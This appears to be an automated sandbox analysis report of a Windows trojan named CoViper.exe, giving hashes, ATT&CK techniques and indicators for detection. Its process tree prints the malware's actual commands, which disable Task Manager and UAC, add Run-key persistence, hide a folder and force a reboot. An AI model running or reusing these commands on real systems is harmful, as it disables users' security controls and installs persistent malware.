eadaf26df948f0fd541f297e2f0bad435aa4bee5c97e4324ad767dacca77e29d

max time kernel
30s
max time network
104s
platform
windows10-1703_x64
resource
win10-20230220-en
resource tags

arch:x64arch:x86image:win10-20230220-enlocale:en-usos:windows10-1703-x64system
submitted
09-05-2023 19:14

Sharing

Copy URL

Twitter E-mail

Reason

Machine shutdown

Report Analysis Logs

General

Target

trojan-leaks-main/CoViper.exe
Size

286KB
MD5

e20ee9bbbd1ebe131f973fe3706ca799
SHA1

4e92e5cbe9092f94b4f4951893b5d9ca304d292c
SHA256

f632b6e822d69fb54b41f83a357ff65d8bfc67bc3e304e88bf4d9f0c4aedc224
SHA512

d50524992662aa84d5b4340525a25d915e91e464a725aa6851de206fd294aa7f4fcefe695ce463ce652b0a03874b75c0678b4c708d2b71f7c18804d1365d3458
SSDEEP

6144:egtJZ0NSt7Jb/Is8vIfYg6KcZQV7GdRMrKUIvcgfoS3Qz89r:egWNStd7R8cYgsZK7qCrqfoS3Mcr

Score

10^/10

evasion persistence trojan upx

Malware Config

Signatures

UAC bypass 3 TTPs 1 IoCs
evasion trojan

Bypass User Account Control
T1088

Disabling Security Tools
T1089

Modify Registry
T1112

Processes:

reg.exe

description ioc process

Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe
Disables Task Manager via registry modification
evasion

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe

UPX packed file 3 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral4/memory/4272-119-0x0000000000400000-0x0000000000473000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\trojan-leaks-main\run.exe	upx
behavioral4/memory/4272-141-0x0000000000400000-0x0000000000473000-memory.dmp	upx

Adds Run key to start application 2 TTPs 6 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

reg.exereg.exereg.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\GoodbyePC! = "C:\\COVID-19\\end.exe"	reg.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\CheckForUpdates = "C:\\COVID-19\\Update.vbs"	reg.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\COVID-19\\run.exe"	reg.exe

Modifies data under HKEY_USERS 15 IoCs

Processes:

LogonUI.exe

description	ioc	process
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292311040"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "1"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365271"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365271"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10"	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4288567808"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292311040"	LogonUI.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = a6d8ff0076b9ed00429ce3000078d700005a9e000042750000264200f7630c00	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM	LogonUI.exe

Modifies registry key 1 TTPs 10 IoCs

Modify Registry
T1112

Processes:

reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exe

pid process

4748 reg.exe
2584 reg.exe
4796 reg.exe
4620 reg.exe
4152 reg.exe
4156 reg.exe
1084 reg.exe
1884 reg.exe
2264 reg.exe
4756 reg.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

shutdown.exe

description pid process

Token: SeShutdownPrivilege 2952 shutdown.exe
Token: SeRemoteShutdownPrivilege 2952 shutdown.exe
Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

LogonUI.exe

pid process

1284 LogonUI.exe

pid	process
4748	reg.exe
2584	reg.exe
4796	reg.exe
4620	reg.exe
4152	reg.exe
4156	reg.exe
1084	reg.exe
1884	reg.exe
2264	reg.exe
4756	reg.exe

description	pid	process
Token: SeShutdownPrivilege	2952	shutdown.exe
Token: SeRemoteShutdownPrivilege	2952	shutdown.exe

pid	process
1284	LogonUI.exe

Suspicious use of WriteProcessMemory 39 IoCs

Processes:

CoViper.execmd.exe

description	pid	process	target process
PID 4272 wrote to memory of 1532	4272	CoViper.exe	cmd.exe
PID 4272 wrote to memory of 1532	4272	CoViper.exe	cmd.exe
PID 4272 wrote to memory of 1532	4272	CoViper.exe	cmd.exe
PID 1532 wrote to memory of 4508	1532	cmd.exe	attrib.exe
PID 1532 wrote to memory of 4508	1532	cmd.exe	attrib.exe
PID 1532 wrote to memory of 4508	1532	cmd.exe	attrib.exe
PID 1532 wrote to memory of 4620	1532	cmd.exe	reg.exe
PID 1532 wrote to memory of 4620	1532	cmd.exe	reg.exe
PID 1532 wrote to memory of 4620	1532	cmd.exe	reg.exe
PID 1532 wrote to memory of 4748	1532	cmd.exe	reg.exe
PID 1532 wrote to memory of 4748	1532	cmd.exe	reg.exe
PID 1532 wrote to memory of 4748	1532	cmd.exe	reg.exe
PID 1532 wrote to memory of 4756	1532	cmd.exe	reg.exe
PID 1532 wrote to memory of 4756	1532	cmd.exe	reg.exe
PID 1532 wrote to memory of 4756	1532	cmd.exe	reg.exe
PID 1532 wrote to memory of 2584	1532	cmd.exe	reg.exe
PID 1532 wrote to memory of 2584	1532	cmd.exe	reg.exe
PID 1532 wrote to memory of 2584	1532	cmd.exe	reg.exe
PID 1532 wrote to memory of 4152	1532	cmd.exe	reg.exe
PID 1532 wrote to memory of 4152	1532	cmd.exe	reg.exe
PID 1532 wrote to memory of 4152	1532	cmd.exe	reg.exe
PID 1532 wrote to memory of 4156	1532	cmd.exe	reg.exe
PID 1532 wrote to memory of 4156	1532	cmd.exe	reg.exe
PID 1532 wrote to memory of 4156	1532	cmd.exe	reg.exe
PID 1532 wrote to memory of 4796	1532	cmd.exe	reg.exe
PID 1532 wrote to memory of 4796	1532	cmd.exe	reg.exe
PID 1532 wrote to memory of 4796	1532	cmd.exe	reg.exe
PID 1532 wrote to memory of 1084	1532	cmd.exe	reg.exe
PID 1532 wrote to memory of 1084	1532	cmd.exe	reg.exe
PID 1532 wrote to memory of 1084	1532	cmd.exe	reg.exe
PID 1532 wrote to memory of 1884	1532	cmd.exe	reg.exe
PID 1532 wrote to memory of 1884	1532	cmd.exe	reg.exe
PID 1532 wrote to memory of 1884	1532	cmd.exe	reg.exe
PID 1532 wrote to memory of 2264	1532	cmd.exe	reg.exe
PID 1532 wrote to memory of 2264	1532	cmd.exe	reg.exe
PID 1532 wrote to memory of 2264	1532	cmd.exe	reg.exe
PID 1532 wrote to memory of 2952	1532	cmd.exe	shutdown.exe
PID 1532 wrote to memory of 2952	1532	cmd.exe	shutdown.exe
PID 1532 wrote to memory of 2952	1532	cmd.exe	shutdown.exe

Views/modifies file attributes 1 TTPs 1 IoCs
evasion

Hidden Files and Directories
T1158

Processes:

attrib.exe

pid process

4508 attrib.exe

pid	process
4508	attrib.exe

C:\Users\Admin\AppData\Local\Temp\trojan-leaks-main\CoViper.exe
"C:\Users\Admin\AppData\Local\Temp\trojan-leaks-main\CoViper.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4272

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\703E.tmp\coronavirus.bat""
2⤵
- Suspicious use of WriteProcessMemory
PID:1532

C:\Windows\SysWOW64\attrib.exe
attrib +H C:\COVID-19
3⤵
- Views/modifies file attributes
PID:4508

C:\Windows\SysWOW64\reg.exe
reg.exe ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v disabletaskmgr /t REG_DWORD /d 1 /f
3⤵
- Modifies registry key
PID:4620

C:\Windows\SysWOW64\reg.exe
reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
3⤵
- UAC bypass
- Modifies registry key
PID:4748

C:\Windows\SysWOW64\reg.exe
reg.exe ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v wallpaper /t REG_SZ /d C:\COVID-19\wallpaper.jpg /f
3⤵
- Modifies registry key
PID:4756

C:\Windows\SysWOW64\reg.exe
reg.exe ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop /v NoChangingWallPaper /t REG_DWORD /d 1 /f
3⤵
- Modifies registry key
PID:2584

C:\Windows\SysWOW64\reg.exe
reg.exe ADD HKCU\Control Panel\Cursors /v Arrow /t REG_SZ /d C:\COVID-19\cursor.cur /f
3⤵
- Modifies registry key
PID:4152

C:\Windows\SysWOW64\reg.exe
reg.exe ADD HKCU\Control Panel\Cursors /v AppStarting /t REG_SZ /d C:\COVID-19\cursor.cur /f
3⤵
- Modifies registry key
PID:4156

C:\Windows\SysWOW64\reg.exe
reg.exe ADD HKCU\Control Panel\Cursors /v Hand /t REG_SZ /d C:\COVID-19\cursor.cur /f
3⤵
- Modifies registry key
PID:4796

C:\Windows\SysWOW64\reg.exe
reg.exe ADD HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v CheckForUpdates /t REG_SZ /d C:\COVID-19\Update.vbs /f
3⤵
- Adds Run key to start application
- Modifies registry key
PID:1084

C:\Windows\SysWOW64\reg.exe
reg.exe ADD HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v explorer.exe /t REG_SZ /d C:\COVID-19\run.exe /f
3⤵
- Adds Run key to start application
- Modifies registry key
PID:1884

C:\Windows\SysWOW64\reg.exe
reg.exe ADD HKLM\software\Microsoft\Windows\CurrentVersion\Run /v GoodbyePC! /t REG_SZ /d C:\COVID-19\end.exe /f
3⤵
- Adds Run key to start application
- Modifies registry key
PID:2264

C:\Windows\SysWOW64\shutdown.exe
shutdown -r -t 5
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2952

C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x0 /state0:0xa3ace055 /state1:0x41c64e6d
1⤵
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
PID:1284

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

T1060

Hidden Files and Directories

T1158

Privilege Escalation

Bypass User Account Control

T1088

Defense Evasion

Bypass User Account Control

T1088

Disabling Security Tools

T1089

Modify Registry

T1112

Hidden Files and Directories

T1158

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\703E.tmp\coronavirus.bat
Filesize
1KB

MD5
e9b2f5e9305dc2a39258d69264647c53

SHA1
87653e2ba1bf810feb472391cef4ffae82e38ea9

SHA256
4fd9b85eec0b49548c462acb9ec831a0728c0ef9e3de70e772755834e38aa3b3

SHA512
7b0ff3dde5ba6d098f970a8d09c690652607cb3f8806b942922f7b92df45b4cc788f13dd376b6d48404178a5462baddafbb61b893074b42dbf14836826af9881

Download Submit
C:\Users\Admin\AppData\Local\Temp\trojan-leaks-main\Update.vbs
Filesize
156B

MD5
bfbafdf20dadf4e83476228f2f86e80c

SHA1
fcc31feb12f3ccd786b17d46c5f487c22ea74a38

SHA256
a1a8d79508173cf16353e31a236d4a211bdcedef53791acce3cfba600b51aaec

SHA512
157ba2aaa5bd715119381a593ec78ac83f2e2e35512764ec99878cd4019d87837bb96457cb2de5e64df1510cf2935aa91918c27e686a2451c095bbbaedc84321

Download Submit
C:\Users\Admin\AppData\Local\Temp\trojan-leaks-main\cursor.cur
Filesize
13KB

MD5
21f48a9e113317b8e2b3ce5366621aa1

SHA1
674c0fc07675d3455780690c38f25f6fbd20b401

SHA256
13c4423ed872e71990e703a21174847ab58dec49501b186709b77b772ceeab52

SHA512
50b99a9e44b3fefce32ad729048d8491cfa403425efe84c48038ab97dbdb403fbe35dfd50a82018d180144e1c84243622f45a2b11a06e6f105f13636fff7d75b

Download Submit
C:\Users\Admin\AppData\Local\Temp\trojan-leaks-main\end.exe
Filesize
47KB

MD5
7def1c942eea4c2024164cd5b7970ec8

SHA1
b2f4288577bf8f8f06a487b17163d74ebe46ab43

SHA256
c3f11936fe43d62982160a876cc000f906cb34bb589f4e76e54d0a5589b2fdb9

SHA512
87b023b8550fcb7b7948b33eb76dd8e22452669fba280b384bc2c2162d908eaa95cdac3f31136bc2aed07944cebdc22bce34f2a96ce4f40353645f5a2a94f5ce

Download Submit
C:\Users\Admin\AppData\Local\Temp\trojan-leaks-main\mainWindow.exe
Filesize
148KB

MD5
e6ccc960ae38768664e8cf40c74a9902

SHA1
d29cbc92744db7dc5bb8b7a8de6e3fa2c75b9dcd

SHA256
b780e24e14885c6ab836aae84747aa0d975017f5fc5b7f031d51c7469793eabe

SHA512
a3a7fa630bafa9508b78af298893733b365e4a185a47b231fb0bfdffc4ed2adacbdbc65fd8261cdd8a589998590a82416cb21200e0eed1bcef67b7655c9b101d

Download Submit
C:\Users\Admin\AppData\Local\Temp\trojan-leaks-main\run.exe
Filesize
21KB

MD5
b1349ca048b6b09f2b8224367fda4950

SHA1
44fac7dd4b9b1ccc61af4859c8104dd507e82e2d

SHA256
c46c3d2bea1e42b628d6988063d247918f3f8b69b5a1c376028a2a0cadd53986

SHA512
f1cc8116d6eb91e6ecb214ac647c7a9a4ca7d2733af3bbca68939722c11e61a33213aa8c1cc6024c0f186db9edca48006f8f13d3282c7be921b3246cba975810

Download Submit
C:\Users\Admin\AppData\Local\Temp\trojan-leaks-main\wallpaper.jpg
Filesize
1KB

MD5
087f4545e13bd7b8e1f36c941a62f8a4

SHA1
f43ac7023ca49efe5509993667f04c2fbf6ac722

SHA256
4a17f58a8bf2b26ece23b4d553d46b72e0cda5e8668458a80ce8fe4e6d90c42d

SHA512
8b309437fb43ce8667ead9709fd5700b719ee46bd294c4ee4b554cd064de63b3d5165bac83e349c54491a97c8f2241dc29f92f586c5ef50689b681386dc07c31

Download Submit
memory/4272-119-0x0000000000400000-0x0000000000473000-memory.dmp

Filesize
460KB

Download
memory/4272-141-0x0000000000400000-0x0000000000473000-memory.dmp

Filesize
460KB

Download

Resubmissions

Analysis

Sharing

Errors

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads